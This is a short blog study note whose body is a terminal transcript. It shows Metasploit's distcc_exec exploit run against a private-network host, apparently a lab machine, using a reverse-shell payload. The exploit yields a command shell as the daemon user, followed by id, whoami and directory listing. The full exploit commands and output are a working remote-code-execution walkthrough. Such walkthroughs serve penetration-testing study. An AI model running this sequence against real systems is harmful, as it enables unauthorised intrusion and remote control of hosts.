Penetration Testing Notes 2013-07-31

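I went on a trip last week and came back utterly worn out; I really can't understand why so many people pay money to suffer. Here is today's update. I have recently been working on the video tutorials for 51, and I still haven't recovered since getting back from the trip, so consider this a study note.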

  

Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
System information as of Wed Jul 31 14:55:12 CST 2013
System load:  0.31               Processes:           149
Usage of /:   72.0% of 19.06GB   Users logged in:     1
Memory usage: 25%                IP address for eth0: 192.168.11.40
Swap usage:   3%
=> There is 1 zombie process.
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Wed Jul 31 14:31:36 2013 from 192.168.11.5
root@bt:~#
root@bt:~#
root@bt:~# msfpro
[*] Starting Metasploit Console...
_---------.
.' #######   ;."
.---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
"--'.@@@  -.@        @ ,'-   .'--"
".@' ; @       @ `.  ;'
|@@@@ @@@     @    .
' @@@ @@   @@    ,
`.@@@@    @@   .
',@@     @   ;           _____________
(   3 C    )     /|___ / Metasploit! \
;@'. __*__,."    \|--- \_____________/
'(.,...."/
=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1138 exploits - 718 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
Compatible Payloads
===================
Name                                Disclosure Date  Rank    Description
----                                ---------------  ----    -----------
cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
cmd/unix/reverse                                     normal  Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  3632             yes       The target port
Payload options (cmd/unix/reverse):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Target
msf exploit(distcc_exec) > set RHOST 192.168.11.17
RHOST => 192.168.11.17
msf exploit(distcc_exec) > set LHOST 192.168.11.40
LHOST => 192.168.11.40
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ruCpcMy2m0BrAfbq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ruCpcMy2m0BrAfbq\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.11.40:4444 -> 192.168.11.17:58472) at 2013-07-31 14:59:21 +0800
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
cd /
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

 

This article is from the “文东会” blog; please contact the author before reposting!
